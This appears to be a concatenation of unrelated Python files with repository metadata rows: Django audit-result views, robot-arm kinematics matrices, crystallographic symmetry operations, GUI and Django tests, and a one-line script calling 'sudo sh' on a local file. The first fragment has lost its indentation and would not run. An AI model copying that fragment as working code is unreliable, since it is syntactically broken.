pgrgr.href = reverse('group_rule_group_results_audit_group_website_page', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, website_slug, pgrgr.get_page_number()])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['website_result'] = wsr
context['page_results'] = pgrgrs
return context
class GroupRuleGroupResultsAuditGroupWebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupWebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
pgr = PageResult.objects.get(ws_report=wsr, page_number=page_num)
if rule_grouping == 'gl':
pgrg = pgr.page_gl_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
pgrg = pgr.page_rs_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
pgrg = pgr.page_rc_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrr in pgrrs:
pgrr.title = pgrr.rule.summary_html
pgrr.href = reverse('group_rule_group_results_audit_group_website_page_rule', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, website_slug, page_num, pgrr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['website_result'] = wsr
context['page_result'] = pgr
context['page_rule_results'] = pgrrs
return context
class GroupRuleGroupResultsAuditGroupWebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupWebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
r = prr.rule
if rule_grouping == 'gl':
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
context['rule_slug'] = rule_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_result'] = ar
context['audit_group_result'] = agr
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = r
return context
| 43.949868 | 230 | 0.665806 | 5,721 | 49,971 | 5.477189 | 0.040552 | 0.062326 | 0.045221 | 0.034722 | 0.84921 | 0.844104 | 0.836126 | 0.828435 | 0.826488 | 0.81768 | 0 | 0.005349 | 0.240499 | 49,971 | 1,136 | 231 | 43.988556 | 0.820278 | 0.050289 | 0 | 0.810644 | 0 | 0 | 0.131573 | 0.041099 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022277 | false | 0 | 0.055693 | 0 | 0.144802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
322cc797910aaad8d54c704fe980308195bb63cd | 6,580 | py | Python | interbotix_xs_toolbox/interbotix_xs_modules/src/interbotix_xs_modules/mr_descriptions.py | Drojas251/interbotix_ros_toolboxes | 212d1fbdad4019dd628e029ef1a8493a04b795cb | [
"BSD-2-Clause"
] | 8 | 2021-08-24T15:27:33.000Z | 2022-03-13T10:44:54.000Z | interbotix_xs_toolbox/interbotix_xs_modules/src/interbotix_xs_modules/mr_descriptions.py | Drojas251/interbotix_ros_toolboxes | 212d1fbdad4019dd628e029ef1a8493a04b795cb | [
"BSD-2-Clause"
] | 4 | 2021-07-26T18:42:05.000Z | 2022-02-15T17:23:18.000Z | interbotix_xs_toolbox/interbotix_xs_modules/src/interbotix_xs_modules/mr_descriptions.py | Drojas251/interbotix_ros_toolboxes | 212d1fbdad4019dd628e029ef1a8493a04b795cb | [
"BSD-2-Clause"
] | 9 | 2021-06-03T08:12:04.000Z | 2022-02-16T01:53:24.000Z | # Modern Robotics Descriptions for all various Interbotix Arms.
# Note that the end-effector is positioned at '<robot_name>/ee_gripper_link'
# and that the Space frame is positioned at '<robot_name>/base_link'.
import numpy as np
class px100:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.0931, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.1931, 0.0, 0.035],
[0.0, 1.0, 0.0, -0.1931, 0.0, 0.135]]).T
M = np.array([[1.0, 0.0, 0.0, 0.248575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.1931],
[0.0, 0.0, 0.0, 1.0]])
class px150:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.10457, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.2],
[1.0, 0.0, 0.0, 0.0, 0.25457, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.358575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.25457],
[0.0, 0.0, 0.0, 1.0]])
class rx150:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.10457, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.2],
[1.0, 0.0, 0.0, 0.0, 0.25457, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.358575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.25457],
[0.0, 0.0, 0.0, 1.0]])
class rx200:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.10457, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.30457, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.30457, 0.0, 0.25],
[1.0, 0.0, 0.0, 0.0, 0.30457, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.408575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.30457],
[0.0, 0.0, 0.0, 1.0]])
class vx250:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.12705, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.37705, 0.0, 0.06],
[0.0, 1.0, 0.0, -0.37705, 0.0, 0.31],
[1.0, 0.0, 0.0, 0.0, 0.37705, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.468575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.37705],
[0.0, 0.0, 0.0, 1.0]])
class vx300:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.12705, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.05955],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.35955],
[1.0, 0.0, 0.0, 0.0, 0.42705, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.536494],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.42705],
[0.0, 0.0, 0.0, 1.0]])
class vx300s:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.12705, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.05955],
[1.0, 0.0, 0.0, 0.0, 0.42705, 0.0],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.35955],
[1.0, 0.0, 0.0, 0.0, 0.42705, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.536494],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.42705],
[0.0, 0.0, 0.0, 1.0]])
class wx200:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.11065, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.31065, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.31065, 0.0, 0.25],
[1.0, 0.0, 0.0, 0.0, 0.31065, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.408575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.31065],
[0.0, 0.0, 0.0, 1.0]])
class wx250:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.11065, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.04975],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.29975],
[1.0, 0.0, 0.0, 0.0, 0.36065, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.458325],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.36065],
[0.0, 0.0, 0.0, 1.0]])
class wx250s:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.11065, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.04975],
[1.0, 0.0, 0.0, 0.0, 0.36065, 0.0],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.29975],
[1.0, 0.0, 0.0, 0.0, 0.36065, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.458325],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.36065],
[0.0, 0.0, 0.0, 1.0]])
class mobile_px100:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.08518, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.18518, 0.0, 0.035],
[0.0, 1.0, 0.0, -0.18518, 0.0, 0.135]]).T
M = np.array([[1.0, 0.0, 0.0, 0.248575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.18518],
[0.0, 0.0, 0.0, 1.0]])
class mobile_wx200:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.104825, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.304825, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.304825, 0.0, 0.25],
[1.0, 0.0, 0.0, 0.0, 0.304825, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.408575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.304825],
[0.0, 0.0, 0.0, 1.0]])
class mobile_wx250s:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.104825, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.354825, 0.0, 0.04975],
[1.0, 0.0, 0.0, 0.0, 0.354825, 0.0],
[0.0, 1.0, 0.0, -0.354825, 0.0, 0.29975],
[1.0, 0.0, 0.0, 0.0, 0.354825, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.458325],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.354825],
[0.0, 0.0, 0.0, 1.0]])
| 40.121951 | 76 | 0.336018 | 1,365 | 6,580 | 1.613919 | 0.058608 | 0.694507 | 0.759873 | 0.722651 | 0.9133 | 0.892419 | 0.878802 | 0.866546 | 0.862914 | 0.835225 | 0 | 0.42447 | 0.412462 | 6,580 | 163 | 77 | 40.368098 | 0.14537 | 0.031003 | 0 | 0.651515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007576 | 0 | 0.30303 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
323cd251474d65c7ad976d5f1585964cddc46a00 | 68 | py | Python | add_ip.py | GingerNinja23/CyberBoost | 2c0d7be801d4bc2a5a3a215b7224cd634a0474fb | [
"MIT"
] | 1 | 2015-01-26T16:39:43.000Z | 2015-01-26T16:39:43.000Z | add_ip.py | GingerNinja23/CyberBoost | 2c0d7be801d4bc2a5a3a215b7224cd634a0474fb | [
"MIT"
] | null | null | null | add_ip.py | GingerNinja23/CyberBoost | 2c0d7be801d4bc2a5a3a215b7224cd634a0474fb | [
"MIT"
] | null | null | null | import os
os.system('sudo sh /home/sivsushruth/Cyberpass/add_ip.sh') | 34 | 58 | 0.794118 | 12 | 68 | 4.416667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 68 | 2 | 58 | 34 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0.652174 | 0.536232 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
329b0a81295d1ebbdac964b1ae5638802e90b536 | 2,603 | py | Python | tests/gui/permen_isolated_test_e2e.py | demid5111/approximate-enthropy | 2ec331087a1af0279a429656890d44a04c734903 | [
"MIT"
] | null | null | null | tests/gui/permen_isolated_test_e2e.py | demid5111/approximate-enthropy | 2ec331087a1af0279a429656890d44a04c734903 | [
"MIT"
] | 7 | 2019-03-02T08:23:11.000Z | 2019-07-06T14:18:23.000Z | tests/gui/permen_isolated_test_e2e.py | demid5111/approximate-enthropy | 2ec331087a1af0279a429656890d44a04c734903 | [
"MIT"
] | null | null | null | from gui_version import App
from tests.gui.app_testing_bed import PermEnTestingBed
from tests.gui.common import check_report
def test_permen_wo_windows(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_windows_cb()
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
def test_permen_wo_windows_wo_norm(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_windows_cb()
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_norm_permen_cb()
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
def test_permen_wo_windows_wo_norm_w_strides(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_windows_cb()
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_norm_permen_cb()
test_app.press_strides_permen_cb()
test_app.set_strides_permen('2')
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
def test_permen_w_windows(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
| 25.028846 | 59 | 0.759124 | 373 | 2,603 | 4.820375 | 0.128686 | 0.182981 | 0.14683 | 0.101224 | 0.914905 | 0.906563 | 0.906563 | 0.906563 | 0.906563 | 0.906563 | 0 | 0.000456 | 0.156742 | 2,603 | 103 | 60 | 25.271845 | 0.818679 | 0 | 0 | 0.871429 | 0 | 0 | 0.000384 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 1 | 0.057143 | false | 0 | 0.042857 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
32c22c817619b077218b1ebb6e6f3bc4d35fb344 | 4,481 | py | Python | problematic/laue_symops.py | stefsmeets/problematic | b9b5294d93f70b7c6fa755594ab1f6111e4bc383 | [
"MIT"
] | 9 | 2018-09-10T04:29:50.000Z | 2020-08-08T17:38:40.000Z | problematic/laue_symops.py | stefsmeets/problematic | b9b5294d93f70b7c6fa755594ab1f6111e4bc383 | [
"MIT"
] | 5 | 2018-06-08T08:46:24.000Z | 2022-02-15T08:15:47.000Z | problematic/laue_symops.py | stefsmeets/problematic | b9b5294d93f70b7c6fa755594ab1f6111e4bc383 | [
"MIT"
] | 7 | 2019-07-16T16:18:05.000Z | 2021-11-04T14:27:00.000Z | symops = {
'1': [
'x, y, z'
],
'-1': [
'x, y, z',
'-x, -y, -z'
],
'2/m:a': [
'x, y, z',
'-x, y, -z',
'-x, -y, -z',
'x, -y, z'
],
'2/m:b': [
'x, y, z',
'-x, y, -z',
'-x, -y, -z',
'x, -y, z'
],
'2/m:c': [
'x, y, z',
'-x, -y, z',
'-x, -y, -z',
'x, y, -z'
],
'mmm': [
'x, y, z',
'-x, -y, z',
'x, -y, -z',
'-x, y, -z',
'-x, -y, -z',
'x, y, -z',
'-x, y, z',
'x, -y, z'
],
'4/m': [
'x, y, z',
'-y, x, z',
'-x, -y, z',
'y, -x, z',
'-x, -y, -z',
'y, -x, -z',
'x, y, -z',
'-y, x, -z'
],
'4/mmm': [
'x, y, z',
'-y, x, z',
'-x, -y, z',
'y, -x, z',
'x, -y, -z',
'-x, y, -z',
'y, x, -z',
'-y, -x, -z',
'-x, -y, -z',
'y, -x, -z',
'x, y, -z',
'-y, x, -z',
'-x, y, z',
'x, -y, z',
'-y, -x, z',
'y, x, z'
],
'-3': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z'
],
'-3m': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'x-y, -y, -z',
'-x, -x+y, -z',
'y, x, -z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z',
'-x+y, y, z',
'x, x-y, z',
'-y, -x, z'
],
'-3m1': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'x-y, -y, -z',
'-x, -x+y, -z',
'y, x, -z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z',
'-x+y, y, z',
'x, x-y, z',
'-y, -x, z'
],
'-31m': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'-y, -x, -z',
'-x+y, y, -z',
'x, x-y, -z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z',
'y, x, z',
'x-y, -y, z',
'-x, -x+y, z'
],
'6/m': [
'x, y, z',
'x-y, x, z',
'-y, x-y, z',
'-x, -y, z',
'-x+y, -x, z',
'y, -x+y, z',
'-x, -y, -z',
'-x+y, -x, -z',
'y, -x+y, -z',
'x, y, -z',
'x-y, x, -z',
'-y, x-y, -z'
],
'6/mmm': [
'x, y, z',
'x-y, x, z',
'-y, x-y, z',
'-x, -y, z',
'-x+y, -x, z',
'y, -x+y, z',
'x-y, -y, -z',
'-x, -x+y, -z',
'y, x, -z',
'-y, -x, -z',
'-x+y, y, -z',
'x, x-y, -z',
'-x, -y, -z',
'-x+y, -x, -z',
'y, -x+y, -z',
'x, y, -z',
'x-y, x, -z',
'-y, x-y, -z',
'-x+y, y, z',
'x, x-y, z',
'-y, -x, z',
'y, x, z',
'x-y, -y, z',
'-x, -x+y, z'
],
'm-3': [
'x, y, z',
'z, x, y',
'y, z, x',
'-y, -z, x',
'z, -x, -y',
'-y, z, -x',
'-z, -x, y',
'-z, x, -y',
'y, -z, -x',
'-x, -y, z',
'x, -y, -z',
'-x, y, -z',
'-x, -y, -z',
'-z, -x, -y',
'-y, -z, -x',
'y, z, -x',
'-z, x, y',
'y, -z, x',
'z, x, -y',
'z, -x, y',
'-y, z, x',
'x, y, -z',
'-x, y, z',
'x, -y, z'
],
'm-3m': [
'x, y, z',
'-y, x, z',
'-x, -y, z',
'y, -x, z',
'x, -z, y',
'x, -y, -z',
'x, z, -y',
'z, y, -x',
'-x, y, -z',
'-z, y, x',
'z, x, y',
'y, z, x',
'-y, -z, x',
'z, -x, -y',
'-y, z, -x',
'-z, -x, y',
'-z, x, -y',
'y, -z, -x',
'y, x, -z',
'-y, -x, -z',
'-x, z, y',
'-x, -z, -y',
'z, -y, x',
'-z, -y, -x',
'-x, -y, -z',
'y, -x, -z',
'x, y, -z',
'-y, x, -z',
'-x, z, -y',
'-x, y, z',
'-x, -z, y',
'-z, -y, x',
'x, -y, z',
'z, -y, -x',
'-z, -x, -y',
'-y, -z, -x',
'y, z, -x',
'-z, x, y',
'y, -z, x',
'z, x, -y',
'z, -x, y',
'-y, z, x',
'-y, -x, z',
'y, x, z',
'x, -z, -y',
'x, z, y',
'-z, y, -x',
'z, y, x'
]
}
| 18.1417 | 23 | 0.15376 | 672 | 4,481 | 1.025298 | 0.025298 | 0.409289 | 0.439768 | 0.342525 | 0.952105 | 0.952105 | 0.937591 | 0.937591 | 0.92598 | 0.92598 | 0 | 0.008023 | 0.527114 | 4,481 | 246 | 24 | 18.215447 | 0.317131 | 0 | 0 | 0.813853 | 0 | 0 | 0.409284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
08e693f0e62ee0cef76fbcea9e4a8c63c58c0b6f | 125 | py | Python | setup_data.py | GulaAren/sharelinks | 6743539aeb43625635adc5cde4f0931bfc8b0e4d | [
"MIT"
] | null | null | null | setup_data.py | GulaAren/sharelinks | 6743539aeb43625635adc5cde4f0931bfc8b0e4d | [
"MIT"
] | null | null | null | setup_data.py | GulaAren/sharelinks | 6743539aeb43625635adc5cde4f0931bfc8b0e4d | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from account import models
from posts import models
def make_user():
pass
def make_link_posts():
pass | 12.5 | 26 | 0.76 | 20 | 125 | 4.6 | 0.65 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009434 | 0.152 | 125 | 10 | 27 | 12.5 | 0.858491 | 0.136 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
3edf20dd4ae6f1ae6c52f17084a0393d3e8e4d51 | 4,079 | py | Python | users/tests/test_views.py | sapuri/srandom.com | e0a7843886a97329f9022d4889ffafa3de708448 | [
"MIT"
] | 3 | 2019-05-04T08:22:38.000Z | 2019-12-14T13:07:49.000Z | users/tests/test_views.py | sapuri/srandom.com | e0a7843886a97329f9022d4889ffafa3de708448 | [
"MIT"
] | 49 | 2019-07-02T15:17:09.000Z | 2022-03-21T20:11:59.000Z | users/tests/test_views.py | sapuri/srandom.com | e0a7843886a97329f9022d4889ffafa3de708448 | [
"MIT"
] | null | null | null | from django.shortcuts import resolve_url
from django.test import TestCase
from users import APP_NAME
from users.models import *
class ListTests(TestCase):
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:list'))
self.assertEqual(200, resp.status_code)
class MypageTests(TestCase):
def setUp(self):
self.user = self.create_user()
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:mypage', username=self.user.username))
self.assertEqual(200, resp.status_code)
class StatisticsTests(TestCase):
def setUp(self):
self.user = self.create_user()
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:statistics', username=self.user.username))
self.assertEqual(200, resp.status_code)
class SettingsTests(TestCase):
def setUp(self):
self.client.force_login(self.create_user())
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:settings'))
self.assertEqual(200, resp.status_code)
class CleardataTests(TestCase):
def setUp(self):
self.user = self.create_user()
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:cleardata', username=self.user.username, sran_level=19))
self.assertEqual(200, resp.status_code)
class DeactivateTests(TestCase):
def setUp(self):
self.client.force_login(self.create_user())
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:deactivate'))
self.assertEqual(200, resp.status_code)
class DownloadTests(TestCase):
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test',
premium: bool = False) -> object:
location = Location.objects.create(location=location)
